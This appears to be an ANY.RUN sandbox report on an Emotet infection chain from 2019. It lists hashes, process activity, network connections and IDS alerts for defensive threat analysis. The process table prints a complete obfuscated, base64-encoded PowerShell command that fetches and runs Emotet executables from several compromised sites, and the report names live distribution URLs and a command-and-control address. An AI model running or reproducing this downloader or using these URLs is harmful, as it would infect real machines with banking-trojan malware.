analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://cas.biscast.edu.ph/updates/personal_sector/verifiable_warehouse/D3buvGg_1yyMJGrM6gp/

Full analysis: https://app.any.run/tasks/509e580e-7717-4633-a151-3c0cd237f94d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 17:19:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
emotet-doc
emotet
loader
trojan
Indicators:
MD5:

025F9867CBC8A8A2A05DA9A75AD6BB52

SHA1:

037D59A24718CE18092ACCAC5D9EDE931C01EECD

SHA256:

85612E0561E5576C17E2698B26ABD82C6B6A824C8C61D17710E02AFCEEF05887

SSDEEP:

3:N1KdEbrL1LpNyWjQ8u5Fi6QofvoK:CGbrZ+xFxnoK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • iexplore.exe (PID: 3228)
      • WINWORD.EXE (PID: 2564)
    • Application was dropped or rewritten from another process

      • 543.exe (PID: 2620)
      • 543.exe (PID: 1768)
      • serialfunc.exe (PID: 1024)
      • serialfunc.exe (PID: 1904)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3388)
    • Emotet process was detected

      • 543.exe (PID: 1768)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 1904)
    • Connects to CnC server

      • serialfunc.exe (PID: 1904)
    • EMOTET was detected

      • serialfunc.exe (PID: 1904)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 2564)
      • 543.exe (PID: 2620)
      • serialfunc.exe (PID: 1024)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2564)
      • iexplore.exe (PID: 2200)
    • Executed via WMI

      • powershell.exe (PID: 3388)
    • Creates files in the user directory

      • powershell.exe (PID: 3388)
    • PowerShell script executed

      • powershell.exe (PID: 3388)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3388)
      • 543.exe (PID: 1768)
    • Starts itself from another location

      • 543.exe (PID: 1768)
    • Connects to server without host name

      • serialfunc.exe (PID: 1904)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2200)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3228)
    • Changes internet zones settings

      • iexplore.exe (PID: 2200)
    • Creates files in the user directory

      • iexplore.exe (PID: 2200)
      • iexplore.exe (PID: 3228)
      • WINWORD.EXE (PID: 2564)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3228)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1708)
      • WINWORD.EXE (PID: 2564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
9
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe 543.exe no specs #EMOTET 543.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2200"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3228"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2200 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2564"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D06C34N8\last_list_12_06_2019_9F31123658[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1708"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3388powershell -w hidden -en JABFAHcAbABxAHcAeAB0AHcAdwA9ACcAUwBxAGgAaABqAGEAbABwAG0AbwBvACcAOwAkAEQAbwB4AGsAZQBsAGcAbwBkACAAPQAgACcANQA0ADMAJwA7ACQATQBsAHcAZQBjAHIAdwB5AGgAZAB3AHEAPQAnAEcAZgB2AHIAZABxAHYAaABjAHgAYwAnADsAJABQAGgAdABjAGEAbgBkAHoAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABvAHgAawBlAGwAZwBvAGQAKwAnAC4AZQB4AGUAJwA7ACQATgB1AHUAcABpAGQAdgBrAD0AJwBSAHQAagBxAHQAaQBlAGsAcwByAHUAagBnACcAOwAkAEYAeABpAG8AdwByAG8AZwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgBXAEUAYgBDAGwAaQBlAE4AVAA7ACQAQQBmAHQAdgBuAGYAaQBuAHgAZgBwAGEAbAA9ACcAaAB0AHQAcABzADoALwAvAG4AYQBnAGUAbAAuAHAAaQBuAHQAbwBnAG8AbwBkAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAGcAZQA5ADYAOAA4AC8AKgBoAHQAdABwADoALwAvAHIAZQBjAHIAZQBhAHQAZQAuAGIAaQBnAGYAaQBsAG0AcAByAG8AZAB1AGMAdABpAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgB4ADgAdgBmADkAagAxADUAMAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAGkAbgBlAHQAaQA5AC4AYwBvAG0ALwA2AHUAaQA3AG0ALwB4AGwAcwB3AGQAagA2AC8AKgBoAHQAdABwADoALwAvAGkAbgB2AGkAcwBpAG8AbgAtAG0AZQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOQB6ADMANwA1ADAAMQAvACoAaAB0AHQAcAA6AC8ALwBoAGEAbgBhAGkAbQBjAGgAdQByAGMAaAAuAG4AZQB0AC8AagA2AGQANgA0ADUAYgAvADAANQA5AGQAZwByAHoANwAvACcALgAiAHMAUABgAEwASQBUACIAKAAnACoAJwApADsAJABLAHIAegBmAGkAegBjAHcAbwBqAGUAbQBuAD0AJwBOAGcAdgBpAGQAeAB0AHoAYgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABUAGwAZgBjAHMAbABqAGoAdwBiAHEAagBnACAAaQBuACAAJABBAGYAdAB2AG4AZgBpAG4AeABmAHAAYQBsACkAewB0AHIAeQB7ACQARgB4AGkAbwB3AHIAbwBnAC4AIgBkAG8AdwBOAGwATwBhAGAAZABmAGAAaQBgAGwARQAiACgAJABUAGwAZgBjAHMAbABqAGoAdwBiAHEAagBnACwAIAAkAFAAaAB0AGMAYQBuAGQAegByACkAOwAkAEoAbwBpAGUAbgBiAHMAeABtAHcAPQAnAFgAbwB4AHYAZwBwAHYAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFAAaAB0AGMAYQBuAGQAegByACkALgAiAGwAZQBgAE4ARwB0AEgAIgAgAC0AZwBlACAAMwA3ADUAMgA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAFAAaAB0AGMAYQBuAGQAegByACkAOwAkAE8AbgB4AHAAegByAHIAeAA9ACcATgB0AGgAZwBmAHEAbAB1AHEAYQAnADsAYgByAGUAYQBrADsAJABUAGwAbwBhAHgAcwBtAGMAPQAnAEMAbAB0AHEAcABtAHQAZgB1AHkAeQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABVAHAAbwBiAHkAawB3AGcAZgBsAD0AJwBNAGEAegB1AHoAbABkAGUAeAByAHYAbQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2620"C:\Users\admin\543.exe" C:\Users\admin\543.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1768--fcb73a32C:\Users\admin\543.exe
543.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1024"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe543.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1904--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Version:
1, 0, 0, 1
Total events
3 533
Read events
2 606
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
10
Unknown types
14

Dropped files

PID
Process
Filename
Type
2200iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2200iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2200iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF5479676140EF5534.TMP
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC2DD.tmp.cvr
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_7CD38F01-CB10-4ED9-808A-B55A05B7E23A.0\9DE9191C.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
1708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_7CD38F01-CB10-4ED9-808A-B55A05B7E23A.0\A92FD122.wmf
MD5:
SHA256:
1708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_7CD38F01-CB10-4ED9-808A-B55A05B7E23A.0\11132ABB.wmf
MD5:
SHA256:
1708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_7CD38F01-CB10-4ED9-808A-B55A05B7E23A.0\AD42AD80.wmf
MD5:
SHA256:
1708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_7CD38F01-CB10-4ED9-808A-B55A05B7E23A.0\4F03CF81.wmf
MD5:
SHA256:
1708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_7CD38F01-CB10-4ED9-808A-B55A05B7E23A.0\CB77EF8E.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3228
iexplore.exe
GET
200
103.19.16.113:80
http://cas.biscast.edu.ph/updates/personal_sector/verifiable_warehouse/D3buvGg_1yyMJGrM6gp/
PH
document
42.5 Kb
suspicious
3388
powershell.exe
GET
200
206.221.182.74:80
http://recreate.bigfilmproduction.com/wp-includes/2x8vf9j1507/
US
executable
492 Kb
malicious
1904
serialfunc.exe
POST
200
47.146.42.234:80
http://47.146.42.234/X76g5R7Iw9qFT
US
flc
132 b
malicious
2200
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2200
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
1904
serialfunc.exe
47.146.42.234:80
Frontier Communications of America, Inc.
US
malicious
3228
iexplore.exe
103.19.16.113:80
cas.biscast.edu.ph
IP-Converge Data Center, Inc.
PH
suspicious
3388
powershell.exe
185.126.218.176:443
nagel.pintogood.com
Netinternet Bilisim Teknolojileri AS
TR
suspicious
3388
powershell.exe
206.221.182.74:80
recreate.bigfilmproduction.com
Choopa, LLC
US
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
cas.biscast.edu.ph
  • 103.19.16.113
suspicious
nagel.pintogood.com
  • 185.126.218.176
suspicious
recreate.bigfilmproduction.com
  • 206.221.182.74
malicious

Threats

PID
Process
Class
Message
3228
iexplore.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
3228
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
3388
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
3388
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
3388
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
3388
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
3388
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3388
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3388
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1904
serialfunc.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 20
1 ETPRO signatures available at the full report
No debug info